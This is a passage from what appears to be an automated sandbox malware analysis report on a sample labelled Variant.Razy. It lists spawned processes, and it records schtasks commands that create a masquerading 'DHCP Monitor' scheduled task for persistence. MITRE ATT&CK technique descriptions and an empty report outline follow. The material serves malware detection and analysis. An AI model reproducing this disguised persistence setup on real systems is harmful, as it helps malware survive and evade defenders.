Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Imagebase:	0xa20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 1000 Parent PID: 5464

General

Start time:	11:57:31
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: schtasks.exe PID: 6536 Parent PID: 5276

General

Start time:	11:57:32
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'
Imagebase:	0xa20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: RegAsm.exe PID: 6228 Parent PID: 904

General

Start time:	11:57:32
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
Imagebase:	0x8c0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 6528 Parent PID: 6536

General

Start time:	11:57:32
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4572 Parent PID: 6228

General

Start time:	11:57:32
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: dhcpmon.exe PID: 1320 Parent PID: 904

General

Start time:	11:57:34
Start date:	23/02/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Imagebase:	0x2f0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	high

Analysis Process: conhost.exe PID: 2872 Parent PID: 1320

General

Start time:	11:57:35
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Variant.Razy.845229.13077.24263

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations